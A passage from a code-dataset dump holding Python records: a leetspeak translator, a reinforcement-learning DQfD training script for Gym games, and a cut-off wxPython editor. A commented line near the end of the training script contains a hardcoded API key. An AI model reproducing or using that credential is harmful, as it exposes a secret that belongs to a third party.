trace(MP.stress.T*MP.dstrain)/MP.rho\n\n","sub_path":"constit.py","file_name":"constit.py","file_ext":"py","file_size_in_byte":4026,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"603744415","text":"def toEng(file):\n\tcharsToEng = {\n\t\t'4': 'A',\n\t\t'8': 'B',\n\t\t'3': 'E',\n\t\t'1': 'L',\n\t\t'0': 'O',\n\t\t'5': 'S',\n\t\t'7': 'T',\n\t\t'@': 'a',\n\t\t'3': 'e',\n\t\t'1': 'l',\n\t\t'0': 'o',\n\t\t'5': 's',\n\t\t'7': 't',\n\t}\n\n\tfor char in charsToEng:\n\t\tfile = file.replace(char, charsToEng.get(char))\n\n\treturn file\n\ndef main():\n\tprint(\"Welcome to the translator\")\n\tleetFileName = input(\"What is the file you would like translated? \")\n\tengFileName = input(\"What is the file you would like the translation to be stored? \")\n\tleetFile = open(leetFileName)\n\tengFile = open(engFileName, \"w\")\n\tleetList = leetFile.readlines()\n\tcleanLeet = []\n\tfor i in leetList:\n\t\tcleanLeet.append(i.strip())\n\tfor i in cleanLeet:\n\t\tengFile.write(toEng(i))\n\t\tengFile.write('\\n')\n\tleetFile.close()\n\tengFile.close()\n\n\nmain()","sub_path":"leetSpeak.py","file_name":"leetSpeak.py","file_ext":"py","file_size_in_byte":764,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"458937905","text":"# -*- coding: utf-8 -*\nimport matplotlib\n# matplotlib.use('TkAgg')\nimport matplotlib.pyplot as plt\nimport tensorflow as tf\nfrom gym import wrappers\nimport gym\nimport numpy as np\nimport pickle\nfrom Config import Config, DDQNConfig, DQfDConfig\nfrom DQfD import DQfD\n#from DQfDDDQN import DQfDDDQN\nfrom collections import deque\nimport itertools\nimport scipy.signal\nimport time\nfrom helper import *\nimport threading\nfrom Memory import Memory\nfrom PIL import Image\nimport math\nimport csv\nfrom datetime import datetime\nimport gc\n\n\n\nimport sys\nfrom random import shuffle\ndef process_frame(frame):\n s = scipy.misc.imresize(frame, [84, 84, 3])\n s = s / 255.0\n return s\n\ndef load_image( infilename ) :\n img = Image.open( infilename )\n img.load()\n data = np.asarray( img, dtype=\"float32\" )/255.0\n data = process_frame(data)\n return data\n\ndef openLog(directory, filename, rlist):\n createTime = datetime.now().strftime('%Y-%m-%d:%H:%M:%S')\n with open(directory + str(createTime) + filename + '.csv', 'w') as myfile:\n wr = csv.writer(myfile, quoting=csv.QUOTE_ALL)\n wr.writerow(rlist)\n myfile.close()\n return str(createTime) + filename\ndef writeLog( directory, filename, rlist):\n with open(directory + filename + '.csv', 'a') as myfile:\n wr = csv.writer(myfile, quoting=csv.QUOTE_ALL)\n wr.writerow(rlist)\n myfile.close()\n\n\n\ndef step(i,f, episode):\n\n\n\n line = f.readline()\n traj = line[:-1].split(\",\")\n episodeEnd = False\n if not line:\n episodeEnd = True\n f.close()\n return '','', '', '', episodeEnd\n state = load_image(screenpath + gameName + \"/\" + str(episode) + \"/\" + str(i) + \".png\")\n #print(screenpath + gameName + \"/\" + str(episode) + \"/\" + str(i) + \".png\")\n #print(traj)\n #print(i)\n #if(traj[3] == \"False\"): done = False\n #else : done = True\n done = bool(int(traj[3]))\n\n action = int(traj[4])\n translatedAction = actionTranslator[action]\n return state, float(traj[1]), done, translatedAction, episodeEnd\n\ndef goNextEpisode(count,file, episode):\n\n\n count = 0\n file = open(trajpath + gameName + \"/\" + str(episode) + \".txt\", 'r')\n file.readline()\n file.readline()\n return count,file\n\ndef set_n_step(container, n, ts):\n #print(container)\n t_list = list(container)\n # accumulated reward of first (trajectory_n-1) transitions\n n_step_reward = sum([t[2] * Config.GAMMA**i for i, t in enumerate(t_list[0:min(len(t_list), n) - 1])])\n for begin in range(len(t_list)):\n end = min(len(t_list) - 1, begin + Config.trajectory_n - 1)\n n_step_reward += t_list[end][2]*Config.GAMMA**(end-begin)\n # extend[n_reward, n_next_s, n_done, actual_n]\n t_list[begin].extend([n_step_reward, t_list[end][3], t_list[end][4], end-begin+1, ts])\n n_step_reward = (n_step_reward - t_list[begin][2])/Config.GAMMA\n return t_list\n\n\n\ndef actionTranslate(gymActions, dataSetActions):\n actionTranslation = []\n length = 0\n for action in dataSetActions :\n i = 0\n for gymAction in gymActions :\n if(action == gymAction):\n actionTranslation.append(i)\n i = i+1\n if(length == actionTranslation.__len__()):\n actionTranslation.append(0)\n length = actionTranslation.__len__()\n return actionTranslation\n\n\ndef map_scores(dqfd_scores=None, ddqn_scores=None, xlabel=None, ylabel=None):\n if dqfd_scores is not None:\n plt.plot(dqfd_scores, 'r')\n if ddqn_scores is not None:\n plt.plot(ddqn_scores, 'b')\n if xlabel is not None:\n plt.xlabel(xlabel)\n if ylabel is not None:\n plt.ylabel(ylabel)\n plt.show()\ndef sign(x): return 1 if x >= 0 else -1\n\nclass Learner(object):\n def __init__(self, name, agent):\n self.name = name\n self.learner = agent\n def run(self):\n global train_itr\n episode_frames = []\n train_itr = 0\n\n scores, e, replay_full_episode = [], 0, None\n sample_log = openLog(Config.LEARNER_DATA_PATH + 'sampleexp/', '', ['step', 'value', 'age', 'demo', 'q_value'])\n replay_log = openLog(Config.LEARNER_DATA_PATH + 'replaymemory/', '', ['step', 'root_priority', 'root_ts', 'root_demo', 'alpha', 'beta'])\n\n while not self.learner.replay_memory.full() :\n time.sleep(1)\n \n for i in range(Config.LEARNER_TRAINING_STEP) :\n # print(agent.replay_memory.full())\n #print(self.learner.replay_memory.tree.data_pointer)\n start_time = time.time()\n\n self.learner.train_Q_network(update=False) # train along with generation\n train_itr += 1\n replay_full_episode = replay_full_episode or e\n if(train_itr % 100 == 0) :\n print(\"learner--- %s seconds ---\" % (time.time() - start_time))\n #print(sys.getsizeof(self.learner.replay_memory.tree.timetree))\n if(train_itr % Config.LEARNER_TRAINING_PART == 0):\n self.learner.save_model()\n sample_demo = float(self.learner.demo_num) / (Config.LEARNER_TRAINING_PART*Config.BATCH_SIZE)\n sample_value = math.pow(self.learner.sum_abs_error / (Config.LEARNER_TRAINING_PART*Config.BATCH_SIZE), 0.4)\n sample_age = self.learner.sum_age / (Config.LEARNER_TRAINING_PART*Config.BATCH_SIZE)\n print(\"learner_sample\")\n print(sample_value)\n print(sample_age)\n print(sample_demo)\n\n print(\"replay_memory\")\n print(self.learner.replay_memory.tree.total_p)\n writeLog(Config.LEARNER_DATA_PATH + 'sampleexp/', sample_log,\n [str(train_itr), str(sample_value), str(sample_age), str(sample_demo)])\n writeLog(Config.LEARNER_DATA_PATH + 'replaymemory/', replay_log,\n [str(train_itr),\n str(self.learner.replay_memory.tree.total_p),\n str(self.learner.replay_memory.tree.total_ts),\n str(self.learner.replay_memory.tree.total_d),\n str(self.learner.replay_memory.tree.alpha),\n str(self.learner.replay_memory.tree.beta)])\n\n self.learner.sum_abs_error = 0\n self.learner.demo_num = 0\n self.learner.sum_age = 0\n if train_itr % Config().UPDATE_TARGET_NET == 0:\n self.learner.sess.run(self.learner.update_target_net)\nclass Actor(object):\n def __init__(self, name, env, agent, local):\n self.name = name\n self.env = env\n self.learner = agent\n self.actor = local\n def run(self):\n global train_itr\n episode_frames = []\n episode_count = 0\n deleted_value = 0\n deleted_age = 0\n deleted_demo = 0\n\n pre_score = 0\n pre_train_itr = 0\n #\n lock = threading.Lock()\n print(self.name)\n\n count = 0 \n scores, e, replay_full_episode = [], 0, None\n filename = ''\n if(self.name == \"actor0\"):\n delete_log = openLog(Config.ACTOR_DATA_PATH+'deletedexp/', 'deletedExp', ['step', 'train_itr','value', 'age', 'demo'])\n episode_log = openLog(Config.ACTOR_DATA_PATH + 'episodescore/', '', ['episode', 'score'])\n while not coord.should_stop():\n done, score, n_step_reward, state = False, 0, None, self.env.reset()\n state = process_frame(state)\n t_q = deque(maxlen=Config.trajectory_n)\n\n while done is False:\n startTime = time.time()\n if(self.actor.replay_memory.full()):\n time.sleep(Config.ACTOR_SLEEP) # print(index + \" running!\")\n action = self.actor.egreedy_action(state) # e-greedy action for train\n next_state, reward, done, _ = self.env.step(action)\n # env.render()\n episode_frames.append(next_state)\n next_state = process_frame(next_state)\n # print(next_state)\n score += reward\n reward = sign(reward) * math.log(1 + abs(reward)) if not done else sign(-100) * math.log(1 + abs(-100))\n reward_to_sub = 0. if len(t_q) < t_q.maxlen else t_q[0][2] # record the earliest reward for the sub\n t_q.append([state, action, reward, next_state, done, 0.0])\n\n if len(t_q) == t_q.maxlen:\n if n_step_reward is None: # only compute once when t_q first filled\n n_step_reward = sum([t[2] * Config.GAMMA ** i for i, t in enumerate(t_q)])\n else:\n n_step_reward = (n_step_reward - reward_to_sub) / Config.GAMMA\n n_step_reward += reward * Config.GAMMA ** (Config.trajectory_n - 1)\n t_q[0].extend([n_step_reward, next_state, done, t_q.maxlen, self.learner.time_step]) # actual_n is max_len here\n self.actor.perceive(t_q[0], self.learner.time_step) # perceive when a transition is completed\n #print(demo)\n # print(t_q[0][3])\n #print(self.learner.time_step)\n count = count +1\n if(count % Config.ACTOR_ACTING_PART == 0 and \"actor0\" == self.name):\n print(self.name + \"--- %s seconds ---\" % (time.time() - startTime) + \"/\"+str(self.actor.replay_memory.tree.data_pointer))\n if(count % Config.ACTOR_ACTING_PART == 0 and \"actor0\" == self.name ):\n\n self.learner.save_model()\n sample_demo = float(self.learner.demo_num) / (Config.LEARNER_TRAINING_PART * Config.BATCH_SIZE)\n sample_value = math.pow(\n self.learner.sum_abs_error / (Config.LEARNER_TRAINING_PART * Config.BATCH_SIZE), 0.4)\n sample_age = self.learner.sum_age / (Config.LEARNER_TRAINING_PART * Config.BATCH_SIZE)\n print(\"learner_sample\")\n print(sample_value)\n print(sample_age)\n print(sample_demo)\n\n print(\"replay_memory\")\n print(self.learner.replay_memory.tree.total_p)\n writeLog(Config.LEARNER_DATA_PATH + 'sampleexp/', sample_log,\n [str(train_itr), str(sample_value), str(sample_age), str(sample_demo)])\n writeLog(Config.LEARNER_DATA_PATH + 'replaymemory/', replay_log,\n [str(train_itr),\n str(self.learner.replay_memory.tree.total_p),\n str(self.learner.replay_memory.tree.total_ts),\n str(self.learner.replay_memory.tree.total_d),\n str(self.learner.replay_memory.tree.alpha),\n str(self.learner.replay_memory.tree.beta)])\n\n self.learner.sum_abs_error = 0\n self.learner.demo_num = 0\n self.learner.sum_age = 0\n\n sum_value = self.actor.replay_memory.tree.avg_val / Config.ACTOR_ACTING_PART\n sum_age = self.actor.replay_memory.tree.avg_time / Config.ACTOR_ACTING_PART\n sum_demo = self.actor.replay_memory.tree.avg_demo / Config.ACTOR_ACTING_PART\n print(\"actor_deleted\")\n print(sum_value)\n print(sum_age)\n print(sum_demo)\n writeLog( Config.ACTOR_DATA_PATH +'deletedexp/', delete_log, [str(count), str(train_itr), str(sum_value), str(sum_age), str(sum_demo)] )\n self.actor.replay_memory.tree.avg_val = 0\n self.actor.replay_memory.tree.avg_time = 0\n self.actor.replay_memory.tree.avg_demo = 0\n if self.actor.replay_memory.full():\n replay_full_episode = replay_full_episode or e\n if train_itr % Config().UPDATE_TARGET_NET == 0:\n #print(\"actor_update_target\"+str(train_itr))\n self.actor.sess.run(self.actor.update_target_net)\n train_itr += 1\n state = next_state\n if done:\n # handle transitions left in t_q\n train_itr += 1\n t_q.popleft() # first transition's n-step is already set\n transitions = set_n_step(t_q, Config.trajectory_n, self.learner.time_step)\n\n for t in transitions:\n self.actor.perceive(t, self.learner.time_step)\n if self.actor.replay_memory.full():\n replay_full_episode = replay_full_episode or e\n if self.actor.replay_memory.full():\n delta = score - pre_score\n actor_num = Config.actor_num\n sub_train_itr = train_itr - pre_train_itr\n #print(sub_train_itr)\n self.actor.replay_memory.update_alpha_and_beta(delta, actor_num, sub_train_itr)\n pre_train_itr = train_itr\n\n if train_itr % Config().UPDATE_TARGET_NET == 0:\n #print(\"actor_update_target\")\n self.actor.sess.run(self.actor.update_target_net)\n\n #scores.append(score)\n if replay_full_episode is not None:\n print(\"episode: {} trained-episode: {} score: {} memory length: {} epsilon: {}\"\n .format(e, e - replay_full_episode, score, len(self.actor.replay_memory), self.actor.epsilon))\n if(self.name == \"actor0\"):\n writeLog(Config.ACTOR_DATA_PATH + 'episodescore/', episode_log,\n [str(episode_count), str(score)])\n\n # 주기적으로 에피소드의 gif 를 저장하고, 모델 파라미터와 요약 통계량을 저장한다.\n if episode_count % Config.GIF_STEP == 0 and episode_count != 0 and self.name == 'actor0':\n time_per_step = 0.01\n images = np.array(episode_frames)\n make_gif(images, './frames/dqfd_image' + str(episode_count) + '.gif',\n duration=len(images) * time_per_step, true_image=True, salience=False)\n episode_count = episode_count + 1\n episode_frames = []\n pre_score = score\n # if np.mean(scores[-min(10, len(scores)):]) > 495:\n # break\n # agent.save_model()\n\n e += 1\n print(\"actor end\")\n return scores\n\nclass Human(object):\n def __init__(self, name, agent, local, episodeList):\n self.name = name\n self.learner = agent\n self.human = local\n self.episodeList = episodeList\n self.episode = self.i = self.f = None\n def run(self):\n print(self.name)\n global train_itr\n while True :\n random.shuffle(self.episodeList)\n self.episode = self.episodeList[0]\n self.i, self.f = goNextEpisode(self.i, self.f, self.episode)\n for n in range(1, episodeList.__len__()):\n done, score, n_step_reward, state = False, 0, None, np.zeros([83, 83, 3], dtype=np.float32)\n state = process_frame(state)\n episodeEnd = False\n t_q = deque(maxlen=Config.trajectory_n)\n while (not episodeEnd):\n\n startTime = time.time()\n next_state, reward, done, action, episodeEnd = step(self.i, self.f, self.episode)\n a = self.human.sess.run(self.human.update_local_ops)\n asum = 0\n for i in a[5]:\n asum = asum + i\n #print(asum)\n self.i = self.i + 1\n if (episodeEnd):\n break\n score += reward\n reward = sign(reward) * math.log(1 + abs(reward)) if not done else sign(-100) * math.log(1 + abs(-100))\n\n\n reward_to_sub = 0. if len(t_q) < t_q.maxlen else t_q[0][2] # record the earliest reward for the sub\n t_q.append([state, action, reward, next_state, done, 1.0])\n # print(next_state)\n if len(t_q) == t_q.maxlen:\n if n_step_reward is None: # only compute once when t_q first filled\n n_step_reward = sum([t[2] * Config.GAMMA ** i for i, t in enumerate(t_q)])\n else:\n n_step_reward = (n_step_reward - reward_to_sub) / Config.GAMMA\n n_step_reward += reward * Config.GAMMA ** (Config.trajectory_n - 1)\n\n t_q[0].extend([n_step_reward, next_state, done, t_q.maxlen, self.learner.time_step]) # actual_n is max_len here\n self.human.perceive(t_q[0], self.learner.time_step) # perceive when a transition is completed\n if(self.i % Config.ACTOR_ACTING_PART == 0):\n print(self.name + \"--- %s seconds ---\" % (time.time() - startTime))\n state = next_state\n if train_itr % Config().UPDATE_TARGET_NET == 0:\n #print(\"human_update_target\")\n self.human.sess.run(self.human.update_target_net)\n\n if (episodeEnd):\n # handle transitions left in t_q\n print(\"human : episode end\")\n t_q.popleft() # first transition's n-step is already set\n transitions = set_n_step(t_q, Config.trajectory_n, self.learner.time_step)\n for t in transitions:\n self.human.perceive(t, self.learner.time_step)\n if self.human.replay_memory.full():\n if train_itr % Config().UPDATE_TARGET_NET == 0:\n #print(\"human_update_target\")\n self.human.sess.run(self.human.update_target_net)\n self.episode = self.episodeList[n]\n self.i, self.f = goNextEpisode(self.i, self.f, self.episode)\n\n if len(scores) >= Config.episode:\n break\n # e += 1\n\n\nclass Trainer():\n def __init__(self, name, env, agent, episodeList):\n self.name = name\n self.env = env\n self.agent = agent\n self.episodeList = episodeList\n self.episode = self.i = self.f = None\n def run(self):\n train_itr = 0\n learn_count = 0\n episode_frames = []\n episode_count = 0\n deleted_value = 0\n deleted_age = 0\n deleted_demo = 0\n\n pre_score = 0\n pre_train_itr = 0\n #\n lock = threading.Lock()\n print(self.name)\n\n count = 0\n scores, e, replay_full_episode = [], 0, None\n filename = ''\n\n random.shuffle(self.episodeList)\n epsidoe_list_count = 0\n self.episode = self.episodeList[epsidoe_list_count]\n self.i, self.f = goNextEpisode(self.i, self.f, self.episode)\n episodeEnd = False\n\n sample_log = openLog(Config.LEARNER_DATA_PATH + 'sampleexp/', '', ['step', 'value', 'age', 'demo', 'qvalue'])\n replay_log = openLog(Config.LEARNER_DATA_PATH + 'replaymemory/', '', ['step', 'root_priority', 'root_ts', 'root_demo', 'alpha', 'beta'])\n delete_log = openLog(Config.ACTOR_DATA_PATH + 'deletedexp/', '', ['step', 'train_itr', 'value', 'age', 'demo'])\n episode_log = openLog(Config.ACTOR_DATA_PATH + 'episodescore/', '', ['episode', 'score'])\n actor_done, actor_score, actor_n_step_reward, actor_state = False, 0, None, self.env.reset()\n human_done, human_score, human_n_step_reward, human_state = False, 0, None, np.zeros([83, 83, 3], dtype=np.float32)\n episodeEnd = False\n t_q_actor = deque(maxlen=Config.trajectory_n)\n t_q_human = deque(maxlen=Config.trajectory_n)\n episode_count = 0\n train_itr = train_itr + 1\n avg_actor_time_step = 0\n act_itr =0\n while (learn_count < Config.LEARNER_TRAINING_STEP):\n\n human_state = process_frame(human_state)\n actor_state = process_frame(actor_state)\n\n while actor_done is False and episodeEnd is False:\n startTime = time.time()\n if(train_itr % Config.ACTOR_HUMAN_COUNT != 0 ):\n action = self.agent.egreedy_action(actor_state) # e-greedy action for train\n next_state, reward, actor_done, _ = self.env.step(action)\n # env.render()\n episode_frames.append(next_state)\n next_state = process_frame(next_state)\n # print(next_state)\n actor_score += reward\n reward = sign(reward) * math.log(1 + abs(reward)) if not actor_done else sign(-100) * math.log(1 + abs(-100))\n reward_to_sub = 0. if len(t_q_actor) < t_q_actor.maxlen else t_q_actor[0][2] # record the earliest reward for the sub\n t_q_actor.append([actor_state, action, reward, next_state, actor_done, 0.0])\n\n if len(t_q_actor) == t_q_actor.maxlen:\n if actor_n_step_reward is None: # only compute once when t_q first filled\n actor_n_step_reward = sum([t[2] * Config.GAMMA ** i for i, t in enumerate(t_q_actor)])\n else:\n actor_n_step_reward = (actor_n_step_reward - reward_to_sub) / Config.GAMMA\n actor_n_step_reward += reward * Config.GAMMA ** (Config.trajectory_n - 1)\n t_q_actor[0].extend([actor_n_step_reward, next_state, actor_done, t_q_actor.maxlen, self.agent.time_step]) # actual_n is max_len here\n self.agent.perceive(t_q_actor[0], self.agent.time_step) # perceive when a transition is completed\n # print(demo)\n # print(t_q[0][3])\n # print(self.learner.time_step)\n\n actor_state = next_state\n if (train_itr % Config.ACTOR_HUMAN_COUNT == 0):\n startTime = time.time()\n next_state, reward, human_done, action, episodeEnd = step(self.i, self.f, self.episode)\n self.i = self.i + 1\n if (episodeEnd != True):\n human_score += reward\n reward = sign(reward) * math.log(1 + abs(reward)) if not human_done else sign(-100) * math.log(1 + abs(-100))\n reward_to_sub = 0. if len(t_q_human) < t_q_human.maxlen else t_q_human[0][2] # record the earliest reward for the sub\n t_q_human.append([human_state, action, reward, next_state, human_done, 1.0])\n # print(next_state)\n if len(t_q_human) == t_q_human.maxlen:\n if human_n_step_reward is None: # only compute once when t_q first filled\n human_n_step_reward = sum([t[2] * Config.GAMMA ** i for i, t in enumerate(t_q_human)])\n else:\n human_n_step_reward = (human_n_step_reward - reward_to_sub) / Config.GAMMA\n human_n_step_reward += reward * Config.GAMMA ** (Config.trajectory_n - 1)\n\n\n t_q_human[0].extend([human_n_step_reward, next_state, human_done, t_q_human.maxlen, self.agent.time_step]) # actual_n is max_len here\n self.agent.perceive(t_q_human[0], self.agent.time_step) # perceive when a transition is completed\n human_state = next_state\n train_itr = train_itr + 1\n if self.agent.replay_memory.full():\n self.agent.train_Q_network(update=False) # train along with generation\n learn_count += 1\n if (train_itr % Config.LEARNER_TRAINING_PART == 0):\n self.agent.save_model()\n sample_demo = float(self.agent.demo_num) / (Config.LEARNER_TRAINING_PART * Config.BATCH_SIZE)\n sample_value = math.pow(\n self.agent.sum_abs_error / (Config.LEARNER_TRAINING_PART * Config.BATCH_SIZE), 0.4)\n sample_age = self.agent.sum_age / (Config.LEARNER_TRAINING_PART * Config.BATCH_SIZE)\n sample_q = self.agent.qvalue /(Config.LEARNER_TRAINING_PART * Config.BATCH_SIZE)\n print(\"learner_sample\")\n print(sample_value)\n print(sample_age)\n print(sample_demo)\n print(sample_q)\n\n sum_sample_q = 0\n for i in range(6):\n sum_sample_q += sample_q[i]\n print(sum_sample_q)\n self.agent.sum_abs_error = 0\n self.agent.demo_num = 0\n self.agent.sum_age = 0\n self.agent.qvalue = 0\n print(\"replay_memory\")\n print(self.agent.replay_memory.tree.total_p)\n writeLog(Config.LEARNER_DATA_PATH + 'sampleexp/', sample_log,\n [str(train_itr), str(sample_value), str(sample_age), str(sample_demo), str(sum_sample_q)])\n writeLog(Config.LEARNER_DATA_PATH + 'replaymemory/', replay_log,\n [str(train_itr),\n str(self.agent.replay_memory.tree.total_p),\n str(self.agent.replay_memory.tree.total_ts),\n str(self.agent.replay_memory.tree.total_d),\n str(self.agent.replay_memory.tree.alpha),\n str(self.agent.replay_memory.tree.beta)])\n gc.collect()\n replay_full_episode = replay_full_episode or e\n if learn_count % Config().UPDATE_TARGET_NET == 0:\n # print(\"actor_update_target\"+str(train_itr))\n self.agent.sess.run(self.agent.update_target_net)\n if(train_itr % 100 == 0):\n print(\"process time : \" + str(time.time() -startTime) + \"/\"+str(self.agent.replay_memory.tree.data_pointer))\n\n if (train_itr % Config.ACTOR_ACTING_PART == 0):\n sum_value = self.agent.replay_memory.tree.avg_val / Config.ACTOR_ACTING_PART\n sum_age = self.agent.replay_memory.tree.avg_time / Config.ACTOR_ACTING_PART\n sum_demo = self.agent.replay_memory.tree.avg_demo / Config.ACTOR_ACTING_PART\n print(\"actor_deleted\")\n print(sum_value)\n print(sum_age)\n print(sum_demo)\n writeLog(Config.ACTOR_DATA_PATH + 'deletedexp/', delete_log,\n [str(count), str(train_itr), str(sum_value), str(sum_age), str(sum_demo)])\n self.agent.replay_memory.tree.avg_val = 0\n self.agent.replay_memory.tree.avg_time = 0\n self.agent.replay_memory.tree.avg_demo = 0\n if actor_done:\n # handle transitions left in t_q\n\n t_q_actor.popleft() # first transition's n-step is already set\n transitions = set_n_step(t_q_actor, Config.trajectory_n, self.agent.time_step)\n\n for t in transitions:\n self.agent.perceive(t, self.agent.time_step)\n if self.agent.replay_memory.full():\n delta = actor_score - pre_score\n actor_num = 1\n sub_train_itr = learn_count - pre_train_itr\n # print(sub_train_itr)\n self.agent.replay_memory.update_alpha_and_beta(delta, actor_num, sub_train_itr)\n pre_train_itr = learn_count\n pre_score = actor_score\n # scores.append(score)\n if replay_full_episode is not None:\n print(\"episode: {} trained-episode: {} score: {} memory length: {} epsilon: {}\"\n .format(e, e - replay_full_episode, actor_score, len(self.agent.replay_memory), self.agent.epsilon))\n writeLog(Config.ACTOR_DATA_PATH + 'episodescore/', episode_log,\n [str(episode_count), str(actor_score)])\n\n # 주기적으로 에피소드의 gif 를 저장하고, 모델 파라미터와 요약 통계량을 저장한다.\n #if episode_count % Config.GIF_STEP == 0 and episode_count != 0 :\n # time_per_step = 0.05\n # images = np.array(episode_frames)\n # make_gif(images, './frames/dqfd_image' + str(episode_count) + '.gif',\n # duration=len(images) * time_per_step, true_image=True, salience=False)\n actor_done, actor_score, actor_n_step_reward, actor_state = False, 0, None, self.env.reset()\n t_q_actor = deque(maxlen=Config.trajectory_n)\n episode_count = episode_count + 1\n episode_frames = []\n\n if (episodeEnd):\n # handle transitions left in t_q\n\n print(\"human : episode end\")\n t_q_human.popleft() # first transition's n-step is already set\n transitions = set_n_step(t_q_human, Config.trajectory_n, self.agent.time_step)\n for t in transitions:\n self.agent.perceive(t, self.agent.time_step)\n if self.agent.replay_memory.full():\n if train_itr % Config().UPDATE_TARGET_NET == 0:\n #print(\"human_update_target\")\n self.agent.sess.run(self.agent.update_target_net)\n epsidoe_list_count += 1\n if(epsidoe_list_count == self.episodeList.__len__()):\n random.shuffle(self.episodeList)\n epsidoe_list_count = 0\n self.episode = self.episodeList[epsidoe_list_count]\n else :\n self.episode = self.episodeList[epsidoe_list_count]\n self.i, self.f = goNextEpisode(self.i, self.f, self.episode)\n human_done, human_score, human_n_step_reward, human_state = False, 0, None, np.zeros([83, 83, 3], dtype=np.float32)\n t_q_human = deque(maxlen=Config.trajectory_n)\n episodeEnd = False\n\n e += 1\n print(\"actor end\")\n\nif __name__ == '__main__':\n\n\n\n # env = wrappers.Monitor(env, '/tmp/CartPole-v0', force=True)\n # ------------------------ get demo scores by DDQN -----------------------------\n # get_demo_data(env)\n # -------------------------- get DDQN scores ----------------------------------\n # ddqn_sum_scores = np.zeros(Config.episode)\n # for i in range(Config.iteration):\n # scores = run_DDQN(i, env)\n # ddqn_sum_scores = np.array([a + b for a, b in zip(scores, ddqn_sum_scores)])\n # ddqn_mean_scores = ddqn_sum_scores / Config.iteration\n # with open('./ddqn_mean_scores.p', 'wb') as f:\n # pickle.dump(ddqn_mean_scores, f, protocol=2)\n #with open('./ddqn_mean_scores.p', 'rb') as f:\n # ddqn_mean_scores = pickle.load(f)\n # ----------------------------- get DQfD scores --------------------------------\n num_threads =Config.actor_num\n num_humanThread = Config.human_num\n actors = []\n acts = []\n threads = []\n #session = tf.InteractiveSession(config=tf.ConfigProto(log_device_placement=True))\n session = tf.InteractiveSession()\n env = gym.make(Config.ENV_NAME)\n replayMemory = Memory(capacity=Config.replay_buffer_size)\n coord = tf.train.Coordinator()\n \n scores, e, replay_full_episode = [], 0, None\n gameName = Config.GAME_NAME\n gameID = Config.ENV_NAME\n dataSetAction = Config.ACTION_SET\n env = gym.make(gameID)\n gymAction = env.unwrapped.get_action_meanings()\n actionTranslator = actionTranslate(gymAction, dataSetAction)\n episodeList = os.listdir(Config().SCREEN_PATH + gameName + '/') # dir is your directory path\n\n screenpath = Config.SCREEN_PATH\n trajpath = Config.TRAJ_PATH\n\n threads = []\n agent = DQfD('learner', env, DQfDConfig(), session, replayMemory)\n env = gym.make(Config.ENV_NAME)\n trainer = Trainer('leanner', env, agent,episodeList)\n trainer.run()\n #local = DQfD('actor0', env, DQfDConfig(), session, replayMemory)\n #actor = Actor('actor0' + 0, env, agent, local)\n #actor.run()\n #with tf.device('/gpu:0'):\n # agent = DQfD('learner', env, DQfDConfig(), session, replayMemory)\n # learner = Learner('learner', agent)\n # #learner.run()\n # #print(agent.getSelectNet())\n # learn = lambda: learner.run()\n # t = threading.Thread(target=learn)\n # t.start()\n # threads.append(t)\n #t = act = None\n #\n #actors = []\n #with tf.device('/cpu:0'):\n # for i in range(num_threads):\n # env = gym.make(Config.ENV_NAME)\n # local = DQfD('actor' + str(i), env, DQfDConfig(), session, replayMemory)\n # actor = Actor('actor' + str(i), env, agent, local)\n # actors.append(actor)\n # for j in range(num_threads):\n # act = lambda: actors[j].run()\n # t = threading.Thread(target= act)\n # t.start()\n # threads.append(t)\n #humans = []\n #with tf.device('/cpu:0'):\n # for i in range(num_humanThread):\n # env = gym.make(Config.ENV_NAME)\n # local = DQfD('human'+str(i), env, DQfDConfig(), session, replayMemory)\n # human = Human('human'+str(i), agent, local, episodeList)\n # humans.append(human)\n # for j in range(num_humanThread):\n # teach = lambda: humans[j].run()\n # t = threading.Thread(target=teach)\n # t.start()\n # threads.append(t)\n coord.join(threads)\n #scores = run_DQfD(0, env, agent)\n\n\n #dqfd_sum_scores = np.zeros(Config.episode)\n #for i in range(Config.iteration):\n # scores = run_DQfD(i, env)\n # dqfd_sum_scores = np.array([a + b for a, b in zip(scores, dqfd_sum_scores)])\n #dqfd_mean_scores = dqfd_sum_scores / Config.iteration\n #with open('./dqfd_mean_scores.p', 'wb') as f:\n # pickle.dump(dqfd_mean_scores, f, protocol=2)\n\n #map_scores(dqfd_scores=dqfd_mean_scores, ddqn_scores=ddqn_mean_scores,\n # xlabel='Red: dqfd Blue: ddqn', ylabel='Scores')\n env.close()\n# gym.upload('/tmp/carpole_DDQN-1', api_key='sk_VcAt0Hh4RBiG2yRePmeaLA')","sub_path":"DQfDTest.py","file_name":"DQfDTest.py","file_ext":"py","file_size_in_byte":35463,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"433279221","text":"#!/usr/bin/env python\n\nimport wx\nimport os\n\nclass MainWindow(wx.Frame):\n \"\"\"we simple devie a new class of Frame\"\"\"\n def __init__(self,parent,title):\n wx.Frame.__init__(self,parent,title=title,size=(500,300))\n self.control=wx.TextCtrl(self,style=wx.TE_MULTILINE)\n self.CreateStatusBar()\n\n filemenu=wx.Menu()\n openmenu=wx.Menu()\n \n openfile = openmenu.Append(wx.ID_OPEN,\"O&pen\",\"open a file\")\n\n menuAbout= filemenu.Append(wx.ID_ABOUT,\"&about\",\"informationa about this program\")\n menuExit=filemenu.Append(wx.ID_EXIT,\"E&xit\",\"terminat the program\")\n\n menuBar=wx.MenuBar()\n\n menuBar.Append(filemenu, \"&File\")\n menuBar.Append(openmenu, \"&open\")\n self.SetMenuBar(menuBar)\n\n self.Bind(wx.EVT_MENU,self.OnAbout,menuAbout)\n self.Bind(wx.EVT_MENU,self.OnExit,menuExit)\n self.Bind(wx.EVT_MENU,self.OnOpen,openfile)\n filemenu.AppendSeparator()\n self.Show(True)\n\n def OnAbout(self,e):\n dlg=wx.MessageDialog(self,'a editor',\"about sam\")\n dlg.ShowModal()\n dlg.Destroy()\n\n def OnExit(self,e):\n self.Close(True)\n def OnOpen(self,e):\n \"\"\"open a file\"\"\"\n self.dirname=' '\n dlg = wx.FileDialog(self,\"choose a file\",self.dirname,\"\",\"*.*\",wx.OPEN)\n if dlg.ShowModal()==wx.ID_OK:\n self.filename = dlg.GetFilename()\n self.dirname = dlg.GetDirectory()\n f = open(os.path.join(self.dirname,self.filename))\n self.control.SetValue(f.read())\n f.close()\n dlg.Destroy()\n\napp=wx.App(False)\nframe=MainWindow(None,'small 